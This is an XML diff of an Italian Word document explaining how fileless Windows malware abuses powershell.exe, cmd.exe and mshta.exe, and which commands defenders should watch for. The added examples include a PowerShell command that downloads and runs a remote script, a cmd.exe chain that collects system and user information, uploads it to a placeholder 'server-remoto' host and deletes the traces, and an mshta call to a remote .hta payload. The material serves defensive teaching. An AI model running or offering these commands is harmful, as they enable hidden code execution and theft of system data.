<commit_message>
frammentazione codice del malware
</commit_message>
<xml_diff>
--- a/Cosa scrivono i malware fileless sui registri.docx
+++ b/Cosa scrivono i malware fileless sui registri.docx
@@ -9,6 +9,7 @@
           <w:bCs/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:u w:val="single"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -174,37 +175,18 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
+        <w:tblStyle w:val="Grigliatabellachiara"/>
         <w:tblW w:w="0" w:type="auto"/>
-        <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        <w:tblBorders>
-          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-        </w:tblBorders>
-        <w:tblCellMar>
-          <w:top w:w="15" w:type="dxa"/>
-          <w:left w:w="15" w:type="dxa"/>
-          <w:bottom w:w="15" w:type="dxa"/>
-          <w:right w:w="15" w:type="dxa"/>
-        </w:tblCellMar>
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="7033"/>
-        <w:gridCol w:w="2595"/>
+        <w:gridCol w:w="7029"/>
+        <w:gridCol w:w="2599"/>
       </w:tblGrid>
       <w:tr>
-        <w:trPr>
-          <w:tblHeader/>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -230,7 +212,6 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -255,13 +236,9 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -299,7 +276,6 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -320,13 +296,9 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -364,7 +336,6 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -385,13 +356,9 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -454,7 +421,6 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -475,13 +441,9 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -535,7 +497,6 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -565,13 +526,9 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -618,7 +575,6 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -639,13 +595,9 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -676,7 +628,6 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -803,30 +754,43 @@
         <w:rPr>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>I comandi a cui prestare più attenzione sono quelli in cui compare:</w:t>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I comandi a cui prestare più </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attenzione</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sono quelli in cui compare:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">• </w:t>
-      </w:r>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -834,7 +798,21 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>cmd</w:t>
+        <w:t>poweshell.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>È il framework d’elezione per il malware fileless poiché integra nativamente il .NET e le API di sistema. La sua potenza risiede nell’</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -843,39 +821,148 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>.exe</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>: Viene utilizzato come interprete di comandi per avviare istruzioni concatenate tramite il parametro /c. Questo consente di eseguire una sequenza compatta di operazioni, come il download del payload, la sua esecuzione e la successiva eliminazione di eventuali tracce. La capacità di concatenare comandi e terminare immediatamente il processo contribuisce all’occultamento dell’attività malevola.</w:t>
+        <w:t>esecuzione in-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>memory</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>: può scaricare, decifrare e avviare payload complessi direttamente nella RAM, senza che alcun file tocchi mai il disco (evitando così la scansione degli antivirus tradizionali).</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">• </w:t>
-      </w:r>
-      <w:r>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Esempio:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>powershell.exe -NoP -W Hidden -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>Exec</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Bypass -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>Command</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "IEX (New-Object Net.WebClient</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>).DownloadString</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>('http://server-remoto/payload.ps1')"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>mshta</w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -883,122 +970,280 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>.exe</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>: Gestisce le HTML Applications (.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>hta</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) e permette l’esecuzione di codice JavaScript o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>VBScript</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> da riga di comando o da URL remoto. Se richiamato tramite una chiave di registro, può eseguire uno script ospitato su un server esterno senza creare file locali, aggirando in alcuni casi i controlli di sicurezza del browser.</w:t>
+        <w:t>cmd.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: Viene utilizzato come interprete di comandi per avviare istruzioni concatenate tramite il parametro /c. Questo consente di eseguire una sequenza compatta di operazioni, come l’esfiltrazione di dati personali, il </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>download</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> di payload, la sua esecuzione e la successiva eliminazione di eventuali tracce. La capacità di concatenare comandi e terminare immediatamente il processo contribuisce all’occultamento dell’attività malevola.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">• </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>r</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">egsvr32.exe: Strumento destinato alla registrazione delle DLL, può essere abusato per scaricare ed eseguire script remoti direttamente in memoria. Essendo un binario Microsoft firmato, il suo utilizzo può eludere sistemi di controllo basati su </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>whitelist</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> applicative, rendendo l’attività meno sospetta.</w:t>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Esempio:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>• Rundll32.exe: È progettato per caricare ed eseguire funzioni contenute in librerie dinamiche. I malware fileless lo sfruttano per richiamare DLL di sistema e forzarle a interpretare codice malevolo come se fosse una funzione legittima, mascherando l’esecuzione all’interno di un processo affidabile.</w:t>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>cmd.exe /c "(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>whoami</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>hostname</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>ipconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>all</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>systeminfo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &amp; net user) &gt; %TEMP%\info.txt &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>ExecutionPolicy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Bypass -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>Command</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>Invoke-WebRequest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -Uri 'http://server-remoto/upload' -Method Post -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>InFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> '%TEMP%\info.txt'" &amp; del %TEMP%\info.txt"</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">• </w:t>
-      </w:r>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -1006,43 +1251,254 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Certutil.exe</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Utile</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> per la gestione dei certificati digitali, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">potrebbe essere </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>utilizzato come strumento di download o di decodifica. Può prelevare contenuti da server remoti oppure convertire stringhe codificate in Base64 memorizzate nel Registro in payload eseguibili, contribuendo alla strategia di attacco senza generare file evidenti sul disco.</w:t>
-      </w:r>
+        <w:t>mshta.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>: Gestisce le HTML Applications (.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>hta</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) e permette l’esecuzione di codice JavaScript o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>VBScript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> da riga di comando o da URL remoto. Se richiamato tramite una chiave di registro, può eseguire uno script ospitato su un server esterno senza creare file locali, aggirando in alcuni casi i controlli di sicurezza del browser.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Esempio:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">mshta.exe   </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId6" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Collegamentoipertestuale"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+            <w:highlight w:val="black"/>
+          </w:rPr>
+          <w:t>http://server-remoto/payload.hta</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
